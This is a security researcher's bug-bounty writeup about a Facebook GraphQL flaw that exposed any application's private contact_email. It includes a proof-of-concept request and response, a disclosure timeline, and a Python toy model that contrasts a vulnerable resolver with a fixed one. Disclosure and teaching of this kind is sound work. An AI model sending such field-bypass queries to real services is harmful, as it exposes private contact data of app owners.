Posted on January 27, 2020

Disclose contact_email of any Facebook application

In the Facebook developer application dashboard there is a field, “contact_email”, that is meant to be private: it is used for communication between an app's admins/developers and Facebook, and is not supposed to be readable by other users.

However, while accessing this field through the Graph API was secured, by changing the query to a GraphQL call I was able to access the email ID of any Facebook application.

Proof of concept

Request:

  POST /graphql
  Host: graph.facebook.com

  q=nodes(35xxxxx28){name,contact_email}

Response:

  {
    "35xxxxx28": {
      "name": "Facebook Application Name",
      "contact_email": "contact@company.com"
    }
  }

Impact

This could have let any malicious user read the contact_email of any Facebook application through the GraphQL endpoint, because the field-level restriction enforced on the Graph API path was not applied on the GraphQL path that served the same data.
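The bug class behind this report is an authorization check that lives in one API front end instead of in the data layer it shares with another. The following is an added toy model, not Facebook's code: an application record with a public field (name) and a private field (contact_email), a Graph-API-style handler that filters by a field-visibility policy, a GraphQL-style nodes(<id>){<fields>} handler that forgets to, and a fixed handler that routes every field through the same check. The application ID, the record contents, the policy table and the differential_check helper are all constructed for illustration; only the shape of the PoC query is taken from the writeup.

```python
"""Toy model of a field-level authorization gap between two API front ends.

Added example, not Facebook's code. The app ID, record, visibility policy
and function names are assumptions; the nodes(<id>){<fields>} query shape
is the one from the PoC above.
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Set, Tuple

# Constructed sample data: one application with a public and a private field.
APPS = {
    "1000000001": {"name": "Demo Application", "contact_email": "contact@example.com"},
}

# Assumed policy: fields a caller who does not administer the app may read.
PUBLIC_FIELDS = {"name"}


@dataclass(frozen=True)
class Caller:
    user_id: str
    admin_of: FrozenSet[str]  # app IDs this user administers


def is_visible(caller: Caller, app_id: str, field: str) -> bool:
    """Single source of truth for field visibility, shared by every front end."""
    return field in PUBLIC_FIELDS or app_id in caller.admin_of


def graph_api_get(caller: Caller, app_id: str, fields: List[str]) -> Dict[str, str]:
    """Graph-API-style handler (GET /<id>?fields=...): applies the visibility check."""
    app = APPS[app_id]
    return {f: app[f] for f in fields if f in app and is_visible(caller, app_id, f)}


_NODES_RE = re.compile(r"^nodes\((\d+)\)\{([a-z_,]+)\}$")


def parse_nodes_query(q: str) -> Tuple[str, List[str]]:
    """Parse the nodes(<id>){<field>,<field>} form used in the PoC request."""
    m = _NODES_RE.match(q.strip())
    if not m:
        raise ValueError("unsupported query: %r" % q)
    return m.group(1), m.group(2).split(",")


def graphql_vulnerable(caller: Caller, q: str) -> Dict[str, Dict[str, str]]:
    """GraphQL-style handler that resolves fields straight from storage.

    This is the defect class from the writeup: a second front end over the
    same data that never consults the field-visibility policy, so the
    caller argument is ignored entirely.
    """
    app_id, fields = parse_nodes_query(q)
    app = APPS[app_id]
    return {app_id: {f: app[f] for f in fields if f in app}}


def graphql_fixed(caller: Caller, q: str) -> Dict[str, Dict[str, str]]:
    """Same handler, but every field goes through the shared visibility check."""
    app_id, fields = parse_nodes_query(q)
    app = APPS[app_id]
    return {app_id: {f: app[f] for f in fields if f in app and is_visible(caller, app_id, f)}}


def differential_check(caller: Caller, app_id: str, fields: List[str], graphql_handler) -> Set[str]:
    """Fields the GraphQL path returns that the Graph API path withholds.

    A non-empty result is exactly the inconsistency the report exploited:
    two endpoints, one record, different answers about who may see what.
    """
    q = "nodes(%s){%s}" % (app_id, ",".join(fields))
    rest = graph_api_get(caller, app_id, fields)
    gql = graphql_handler(caller, q)[app_id]
    return set(gql) - set(rest)


if __name__ == "__main__":
    stranger = Caller(user_id="u1", admin_of=frozenset())
    fields = ["name", "contact_email"]
    print("leaked via vulnerable GraphQL:",
          differential_check(stranger, "1000000001", fields, graphql_vulnerable))
    print("leaked via fixed GraphQL:",
          differential_check(stranger, "1000000001", fields, graphql_fixed))
```

The design point is that the fix is not "add a check to the GraphQL resolver" but "make the GraphQL resolver unable to read a field without going through the same visibility function the Graph API already uses". The differential_check helper is the habit worth keeping when testing real systems: request the same field for the same object through every API surface that serves it, and treat any disagreement as a finding.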

Timeline

  • 21 Nov, 2018 – Report Sent.
  • 28 Nov, 2018 – Triaged.
  • 29 Jan, 2019 – Fixed.
  • 12 Feb, 2019 – Bounty Awarded.

Categories: Security, Writeup
